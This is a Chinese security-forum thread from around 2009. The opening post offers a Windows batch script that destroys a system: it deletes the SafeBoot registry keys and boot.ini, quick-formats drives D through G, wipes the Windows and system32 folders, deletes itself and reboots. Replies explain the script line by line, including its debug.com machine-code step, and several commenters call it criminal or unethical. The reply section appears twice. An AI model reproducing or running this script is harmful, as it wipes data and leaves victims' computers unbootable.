[推荐]一段源码-付费问答-看雪-安全社区|安全招聘|kanxue.com

[旧帖] [推荐]一段源码 0.00雪花

发表于: 2009-12-29 19:17 1942

[旧帖] [推荐]一段源码 0.00雪花

jienting

2009-12-29 19:17

1942

@echo off
echo exit|%ComSpec% /k prompt e 100 B4 00 B0 12 CD 10 B0 03 CD 10 CD 20 $_g$_q$_|debug>nul
chcp 437>nul
graftabl 936>nulREG DELETE “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot” /v Network /f
REG DELETE “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot” /v Minimal /f
ATTRIB %SYSTEMDRIVE%\boot.ini -s -a -r -h
DEL %SYSTEMDRIVE%\boot.ini /f
format d:/q /y
format e:/q /y
format f:/q /y
format g:/q /y
cd c:\
cd windows
del *.* /q
cd system32
del *.* /q
del %0
shutdown -r -t 3

[课程]Android-CTF解题方法汇总！

收藏・1

免费・0

支持

最新回复 (26) 1 2 ▶
zhouligong 雪币： 244 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 12 粉丝 0 关注私信	zhouligong 2 楼这段代码太狠了点吧，会犯罪的～ 2009-12-29 19:20 0
鱼爱上猫雪币： 72 活跃值： (52) 能力值： ( LV3，RANK：30 ) 在线值：发帖 7 回帖 111 粉丝 0 关注私信	鱼爱上猫 3 楼确实很狠。。。。。 2009-12-29 19:22 0
mjliangge 雪币： 36 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 21 粉丝 0 关注私信	mjliangge 4 楼看不懂啊啥玩意!! 2009-12-29 23:18 0
zhouligong 雪币： 244 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 12 粉丝 0 关注私信	zhouligong 5 楼反正不要在自己电脑上测试就行了～ 2009-12-30 11:31 0
薄饼雪币： 98 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 38 粉丝 0 关注私信	薄饼 6 楼人能无耻，但不能这么无耻 2009-12-30 11:38 0
zuoyou 雪币： 18 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 66 粉丝 0 关注私信	zuoyou 7 楼 echo exit\|%ComSpec% /k prompt e 100 B4 00 B0 12 CD 10 B0 03 CD 10 CD 20 $_g$_q$_\|debug>nul chcp 437>nul 这点什么意思 2009-12-30 12:16 0
无棣八维雪币： 8 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 35 粉丝 0 关注私信	无棣八维 8 楼格式化硬盘？有用吗？ 2009-12-30 17:02 0
耳聋雪币： 66 活跃值： (26) 能力值： ( LV4，RANK：50 ) 在线值：发帖 72 回帖 460 粉丝 0 关注私信	耳聋 1 9 楼 @echo off echo exit\|%ComSpec% /k prompt e 100 B4 00 B0 12 CD 10 B0 03 CD 10 CD 20 $_g$_q$_\|debug>nul chcp 437>nul 这段不清楚。 graftabl 936>nulREG DELETE “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot” /v Network /f REG DELETE “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot” /v Minimal /f 删除注册表中的键值 ATTRIB %SYSTEMDRIVE%\boot.ini -s -a -r -h DEL %SYSTEMDRIVE%\boot.ini /f 删除系统盘下面的boot.ini文件，那个文件好像跟系统启动有关，具体不清楚。 format d:/q /y format e:/q /y format f:/q /y format g:/q /y 这段是格式化各个盘符 cd c:\ cd windows del . /q 删除windows目录下的所有文件，后面的参数q不太清楚什么意思。 cd system32 del . /q 删除system32目录下的所有文件。 del %0 这句不清楚。 shutdown -r -t 3 关机并重启，后面的3是时间，毫秒？好像是。不过感觉如果直接运行这个bat文件的话应该好多都不能成功操作吧，最起码删除的东西中有好多系统文件。 2009-12-30 17:48 0
非常来客雪币： 21 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 72 粉丝 0 关注私信	非常来客 10 楼看不明白，谁解释下 2009-12-30 17:52 0
耳聋雪币： 66 活跃值： (26) 能力值： ( LV4，RANK：50 ) 在线值：发帖 72 回帖 460 粉丝 0 关注私信	耳聋 1 11 楼 9楼是我的解释，不对之处万望包涵…… 2009-12-30 18:14 0
不死怨灵雪币： 54 活跃值： (40) 能力值： ( LV3，RANK：20 ) 在线值：发帖 9 回帖 166 粉丝 0 关注私信	不死怨灵 12 楼有同感，不敢乱试但觉得应该是无法成功运行的…… 2009-12-30 18:22 0
AsmDebuger 雪币： 1270 活跃值： (109) 能力值： ( LV5，RANK：60 ) 在线值：发帖 8 回帖 362 粉丝 1 关注私信	AsmDebuger 1 13 楼 B4 00 MOV AH, 0 B0 12 MOV AL, 12 CD 10 INT 10 ;设置显示模式为640X480 B0 03 MOV AL, 3 CD 10 INT 10 ;清屏。 CD 20 INT 20 ;退出 chcp 437>nul ；显示英文，重定向到空，即屏蔽显示。 2009-12-30 18:31 0
zhouligong 雪币： 244 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 12 粉丝 0 关注私信	zhouligong 14 楼第一段代码我也不清楚，猜测是进入debug模式，这样才能强制中止或删除系统相关进程、文件。 attrib命令将文件的系统文件属性（-s）、隐藏文件属性（-h）、只读属性（-r）、存档属性（-a）去掉。 del /q 指安静模式，删除时不需要确认，默认y shutdown -t 3 是指3秒 2009-12-30 19:22 0
fenggui 雪币： 175 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 10 回帖 123 粉丝 0 关注私信	fenggui 15 楼 del . /q // 删除所有文件。不要求确认 shutdown -r -t 3 //重启，等待时间为3秒 chcp 437 >nul //重定向输出，好像与本操作无关吧 2009-12-30 19:32 0
lichaoquan 雪币： 64 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 88 粉丝 0 关注私信	lichaoquan 16 楼拿这样的bat整人可不太道德 2009-12-31 09:13 0
AsmDebuger 雪币： 1270 活跃值： (109) 能力值： ( LV5，RANK：60 ) 在线值：发帖 8 回帖 362 粉丝 1 关注私信	AsmDebuger 1 17 楼 echo exit\|%ComSpec% /k prompt e 100 B4 00 B0 12 CD 10 B0 03 CD 10 CD 20 $_g$_q$_\|debug>nul 参考微软网站解释：环境变量 %comspec% 代表 Windows 命令外壳；这等效于调用 Cmd.exe（它当然会打开一个命令窗口）。那为什么不直接调用 Cmd.exe？是这样，假设您的计算机运行 Windows 98。在这些计算机上，通过运行 Command.com 来调用命令外壳，因为没有 Cmd.exe。使用 %comspec% 有助于确保无论该脚本是在什么版本的 Windows 上运行，都可以获得命令窗口。换句话说，使用此脚本时我们并不是直接运行 debug，而是运行命令外壳的实例，并向该实例传递几个参数。此类参数中的第一个是 /k，它指示命令外壳执行我们要求它完成的任务，然后保持打开状态。我们也可以使用参数 /c（c 代表 close），它在命令窗口完成任务时自动关闭命令窗口。在XP中执行cmd.exe/?，查得/k含义： /K 执行字符串指定的命令但保留 prompt e 100 B4 00 B0 12 CD 10 B0 03 CD 10 CD 20 $_g$_q$_\|debug>nul 这行代码的意思是在命令行输入以上字符，其含义是：运行debug.com，输入e 100 命令表示编程开始，然后输入机器码， $_g$_q 是debug.com的快捷键，$_g是运行刚才的机器码， $_q退出debug程序。 >nul重定向到空，即以上字符不会在屏幕上显示。 2009-12-31 10:55 0
fatfish 雪币： 129 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 21 粉丝 0 关注私信	fatfish 18 楼大开眼界，学习了！ 2010-1-7 10:11 0
爱鸟雪币： 245 活跃值： (93) 能力值： ( LV6，RANK：80 ) 在线值：发帖 21 回帖 318 粉丝 1 关注私信	爱鸟 1 19 楼 del /q是不要求确认 2010-1-7 15:24 0
yangchao忽忽雪币： 125 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 70 粉丝 0 关注私信	yangchao忽忽 20 楼唉这个没什么用啊发给朋友不道德发给不认识的更不道德啊 2010-1-7 15:37 0
hecyril 雪币： 30 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 39 粉丝 0 关注私信	hecyril 21 楼哦看到了上面各位的解释貌似懂了 2010-1-7 18:26 0
connile 雪币： 37 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	connile 22 楼邪恶的产品。。 2010-1-7 18:58 0
昨夜风雪币： 34 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 97 粉丝 0 关注私信	昨夜风 23 楼 chcp 437 >nul graftabl 936 >nul 好像是全屏 2010-1-7 19:12 0
昨夜风雪币： 34 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 97 粉丝 0 关注私信	昨夜风 24 楼 del %0 这句不清楚这句是删除自身。。。就是运行完批处理后，把自己给删除了。。做到神鬼不知 2010-1-7 19:42 0
peterzuo 雪币： 40 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 11 粉丝 0 关注私信	peterzuo 25 楼学习了。 2010-1-7 20:04 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

jienting

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (26) 1 2 ▶
zhouligong 雪币： 244 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 12 粉丝 0 关注私信	zhouligong 2 楼这段代码太狠了点吧，会犯罪的～ 2009-12-29 19:20 0
鱼爱上猫雪币： 72 活跃值： (52) 能力值： ( LV3，RANK：30 ) 在线值：发帖 7 回帖 111 粉丝 0 关注私信	鱼爱上猫 3 楼确实很狠。。。。。 2009-12-29 19:22 0
mjliangge 雪币： 36 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 21 粉丝 0 关注私信	mjliangge 4 楼看不懂啊啥玩意!! 2009-12-29 23:18 0
zhouligong 雪币： 244 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 12 粉丝 0 关注私信	zhouligong 5 楼反正不要在自己电脑上测试就行了～ 2009-12-30 11:31 0
薄饼雪币： 98 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 38 粉丝 0 关注私信	薄饼 6 楼人能无耻，但不能这么无耻 2009-12-30 11:38 0
zuoyou 雪币： 18 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 66 粉丝 0 关注私信	zuoyou 7 楼 echo exit\|%ComSpec% /k prompt e 100 B4 00 B0 12 CD 10 B0 03 CD 10 CD 20 $_g$_q$_\|debug>nul chcp 437>nul 这点什么意思 2009-12-30 12:16 0
无棣八维雪币： 8 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 35 粉丝 0 关注私信	无棣八维 8 楼格式化硬盘？有用吗？ 2009-12-30 17:02 0
耳聋雪币： 66 活跃值： (26) 能力值： ( LV4，RANK：50 ) 在线值：发帖 72 回帖 460 粉丝 0 关注私信	耳聋 1 9 楼 @echo off echo exit\|%ComSpec% /k prompt e 100 B4 00 B0 12 CD 10 B0 03 CD 10 CD 20 $_g$_q$_\|debug>nul chcp 437>nul 这段不清楚。 graftabl 936>nulREG DELETE “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot” /v Network /f REG DELETE “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot” /v Minimal /f 删除注册表中的键值 ATTRIB %SYSTEMDRIVE%\boot.ini -s -a -r -h DEL %SYSTEMDRIVE%\boot.ini /f 删除系统盘下面的boot.ini文件，那个文件好像跟系统启动有关，具体不清楚。 format d:/q /y format e:/q /y format f:/q /y format g:/q /y 这段是格式化各个盘符 cd c:\ cd windows del . /q 删除windows目录下的所有文件，后面的参数q不太清楚什么意思。 cd system32 del . /q 删除system32目录下的所有文件。 del %0 这句不清楚。 shutdown -r -t 3 关机并重启，后面的3是时间，毫秒？好像是。不过感觉如果直接运行这个bat文件的话应该好多都不能成功操作吧，最起码删除的东西中有好多系统文件。 2009-12-30 17:48 0
非常来客雪币： 21 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 72 粉丝 0 关注私信	非常来客 10 楼看不明白，谁解释下 2009-12-30 17:52 0
耳聋雪币： 66 活跃值： (26) 能力值： ( LV4，RANK：50 ) 在线值：发帖 72 回帖 460 粉丝 0 关注私信	耳聋 1 11 楼 9楼是我的解释，不对之处万望包涵…… 2009-12-30 18:14 0
不死怨灵雪币： 54 活跃值： (40) 能力值： ( LV3，RANK：20 ) 在线值：发帖 9 回帖 166 粉丝 0 关注私信	不死怨灵 12 楼有同感，不敢乱试但觉得应该是无法成功运行的…… 2009-12-30 18:22 0
AsmDebuger 雪币： 1270 活跃值： (109) 能力值： ( LV5，RANK：60 ) 在线值：发帖 8 回帖 362 粉丝 1 关注私信	AsmDebuger 1 13 楼 B4 00 MOV AH, 0 B0 12 MOV AL, 12 CD 10 INT 10 ;设置显示模式为640X480 B0 03 MOV AL, 3 CD 10 INT 10 ;清屏。 CD 20 INT 20 ;退出 chcp 437>nul ；显示英文，重定向到空，即屏蔽显示。 2009-12-30 18:31 0
zhouligong 雪币： 244 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 12 粉丝 0 关注私信	zhouligong 14 楼第一段代码我也不清楚，猜测是进入debug模式，这样才能强制中止或删除系统相关进程、文件。 attrib命令将文件的系统文件属性（-s）、隐藏文件属性（-h）、只读属性（-r）、存档属性（-a）去掉。 del /q 指安静模式，删除时不需要确认，默认y shutdown -t 3 是指3秒 2009-12-30 19:22 0
fenggui 雪币： 175 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 10 回帖 123 粉丝 0 关注私信	fenggui 15 楼 del . /q // 删除所有文件。不要求确认 shutdown -r -t 3 //重启，等待时间为3秒 chcp 437 >nul //重定向输出，好像与本操作无关吧 2009-12-30 19:32 0
lichaoquan 雪币： 64 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 88 粉丝 0 关注私信	lichaoquan 16 楼拿这样的bat整人可不太道德 2009-12-31 09:13 0
AsmDebuger 雪币： 1270 活跃值： (109) 能力值： ( LV5，RANK：60 ) 在线值：发帖 8 回帖 362 粉丝 1 关注私信	AsmDebuger 1 17 楼 echo exit\|%ComSpec% /k prompt e 100 B4 00 B0 12 CD 10 B0 03 CD 10 CD 20 $_g$_q$_\|debug>nul 参考微软网站解释：环境变量 %comspec% 代表 Windows 命令外壳；这等效于调用 Cmd.exe（它当然会打开一个命令窗口）。那为什么不直接调用 Cmd.exe？是这样，假设您的计算机运行 Windows 98。在这些计算机上，通过运行 Command.com 来调用命令外壳，因为没有 Cmd.exe。使用 %comspec% 有助于确保无论该脚本是在什么版本的 Windows 上运行，都可以获得命令窗口。换句话说，使用此脚本时我们并不是直接运行 debug，而是运行命令外壳的实例，并向该实例传递几个参数。此类参数中的第一个是 /k，它指示命令外壳执行我们要求它完成的任务，然后保持打开状态。我们也可以使用参数 /c（c 代表 close），它在命令窗口完成任务时自动关闭命令窗口。在XP中执行cmd.exe/?，查得/k含义： /K 执行字符串指定的命令但保留 prompt e 100 B4 00 B0 12 CD 10 B0 03 CD 10 CD 20 $_g$_q$_\|debug>nul 这行代码的意思是在命令行输入以上字符，其含义是：运行debug.com，输入e 100 命令表示编程开始，然后输入机器码， $_g$_q 是debug.com的快捷键，$_g是运行刚才的机器码， $_q退出debug程序。 >nul重定向到空，即以上字符不会在屏幕上显示。 2009-12-31 10:55 0
fatfish 雪币： 129 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 21 粉丝 0 关注私信	fatfish 18 楼大开眼界，学习了！ 2010-1-7 10:11 0
爱鸟雪币： 245 活跃值： (93) 能力值： ( LV6，RANK：80 ) 在线值：发帖 21 回帖 318 粉丝 1 关注私信	爱鸟 1 19 楼 del /q是不要求确认 2010-1-7 15:24 0
yangchao忽忽雪币： 125 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 70 粉丝 0 关注私信	yangchao忽忽 20 楼唉这个没什么用啊发给朋友不道德发给不认识的更不道德啊 2010-1-7 15:37 0
hecyril 雪币： 30 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 39 粉丝 0 关注私信	hecyril 21 楼哦看到了上面各位的解释貌似懂了 2010-1-7 18:26 0
connile 雪币： 37 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	connile 22 楼邪恶的产品。。 2010-1-7 18:58 0
昨夜风雪币： 34 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 97 粉丝 0 关注私信	昨夜风 23 楼 chcp 437 >nul graftabl 936 >nul 好像是全屏 2010-1-7 19:12 0
昨夜风雪币： 34 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 8 回帖 97 粉丝 0 关注私信	昨夜风 24 楼 del %0 这句不清楚这句是删除自身。。。就是运行完批处理后，把自己给删除了。。做到神鬼不知 2010-1-7 19:42 0
peterzuo 雪币： 40 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 11 粉丝 0 关注私信	peterzuo 25 楼学习了。 2010-1-7 20:04 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复